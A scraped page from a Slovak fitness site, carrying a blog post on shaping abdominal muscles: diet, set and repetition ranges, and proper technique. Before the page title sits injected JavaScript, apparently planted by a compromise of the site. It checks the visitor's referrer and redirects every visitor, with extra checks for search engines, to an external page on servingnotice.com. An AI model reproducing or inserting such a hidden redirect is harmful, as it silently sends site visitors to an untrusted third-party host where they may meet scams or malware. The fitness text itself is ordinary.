var toUrl="http://"; var rUrl = document.referrer; var patrn=/(.*)$/; toUrl+="servingnotice.com/O7ul2v/intermediary.html?richubaidaninfo"; toUrl+=""; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)aol.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)yahoo.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)bing.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; Ako vyformovať brucho | www.bodytrener.sk
Blog
...naučte sa niečo nové!

Ako vyformovať brucho

tucny-bruchoTakmer každý by chcel mať peknú postavu a vyrysované brušné svaly. Niekomu stačí ploché bruško, iným veľké kocky, ďalším menšie. Snažíte sa dať do cvičenia brucha maximum, ale môže to byť viac kontaproduktívne ako na úžitok. Neberiete brušné svaly ako iné svaly na tele.

Snažíte sa cvičiť brucho každý deň vo veľkom počte sérii, opakovaní, ale nevidíte nejaké extra zmeny. Keď idete do posilňovne si zacvičiť, cvičíte napríklad biceps rovnaký cvik celý týždeň, to asi nie. To isté je aj z bruchom. Nedosiahnete taký efekt nakoľko brušné svaly potrebujú tiež regenerovať. Nemôžete ich neustále len zaťažovať. Cvičením brucha nevyrysujete brucho ak nebudete aj zdravo jesť. Nie nadarmo sa hovorí, že 70% úspechu pri cvičení je strava a 30% je tréning. Pri pracovaní na vyrysovaní brušných svalov to platí dvojnásobne. Môžete cvičiť akokoľvek tvrdo, ale ak sa budete neustále prežierať a jesť nezdravé jedlá, zmena sa nedostaví. Je to z toho dôvodu, že svaly tam určite sú len sú pod vrstvou tuku.

Ako vypracovať menšie kocky, ale viac vyrysované? – dodržiavať stravu, cvičiť menší počet sérii s väčším počtom opakovaní okolo 15 – 25 opakovaní na jednu sériu bez závažia

Ako vypracovať mohutné kocky? – dodržiavať stravu, cvičiť väčší počet sérii a menší počet opakovaní okolo 10-15 opakovaní na jednu sériu. Postupne sa snažte cvičiť aj s kotúčmi alebo činkami, kedy budete musieť brušnými svalmi zdvíhať väčšiu váhu.

Ako vypracovať ploché bruško? (platí hlavne pre ženy) - zdravá strava, necvičte len jednu partiu, menší počet sérii s väčším počtom opakovaní okolo 10 -15 opakovaní na jednu sériu.

Často sa však stáva, že ľudia uprednostia odcvičenie všetkých opakovaní a sérii, ktoré si zvolili pred správnou technikou. Radšej robte dané opakovania technicky správne a neuprednostňuje kvantitu pred kvalitou. Váš tím bodytrener.sk

Pridať komentár




Odber noviniek

Pridajte sa k odberu noviniek a získajte najnovšie informácie o článkoch, zľavách a súťažiach.

Potrebujete pomoc?

Adresa:
Bodytrener.sk
Pažite 5
010 09 Žilina

Pracovná doba:
Pondelok – Piatok
10:00 – 18:00

E-mail: info@bodytrener.sk
Telefón: +421 904 569 865

Bankové účty:
2200359578/8330 - SLOVENSKO
2900359579/2010 - ČESKO

© 2013 Bodytrener.sk. Všetky práva vyhradené.

Pridaj si nás na Facebooku